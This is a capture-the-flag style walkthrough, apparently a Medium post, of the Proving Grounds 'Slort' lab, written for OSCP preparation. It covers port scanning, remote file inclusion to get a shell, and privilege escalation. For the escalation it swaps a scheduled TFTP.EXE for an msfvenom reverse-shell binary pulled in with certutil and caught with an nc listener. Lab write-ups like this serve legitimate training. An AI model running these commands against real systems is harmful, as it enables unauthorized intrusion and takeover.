Proving grounds:Slort

Today we will take a look at Proving grounds: Slort. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, Help, NULL:
|_ Host '' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
feroxbuster — url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.asp,.aspx,.xml

Check the “?page” parameter


Do a simple rfi check.

Reverse shell

Prepare the payload

Ready now let’s run it with curl.

We got the shell.

There is a backup folder in the C:\ folder. Let’s look there

Info.txt shows the code that is executed every 5 minutes.

C:\Backup>more info.txt
more info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i get backup.txt

Let’s check our permissions on the folder. We have the authority to write and delete

PS C:\> icacls Backup
icacls Backup
Backup BUILTIN\Users:(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

I create a payload called TFTP.EXE. I’ll move and delete the original file and replace it with my own.

└─$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=21 -f exe > TFTP.EXE 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Delete the original file

C:\Backup>del TFTP.EXE

upload our own file.

C:\Backup>certutil -urlcache -split -f
certutil -urlcache -split -f
**** Online ****
000000 ...
CertUtil: -URLCache command completed successfully.


└─$ sudo nc -nvlp 21 
[sudo] password for kali:
listening on [any] 21 ...
connect to [] from (UNKNOWN) [] 50259
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.


And now we are the Administrator

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "eJPT, CEH, OSCP"

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store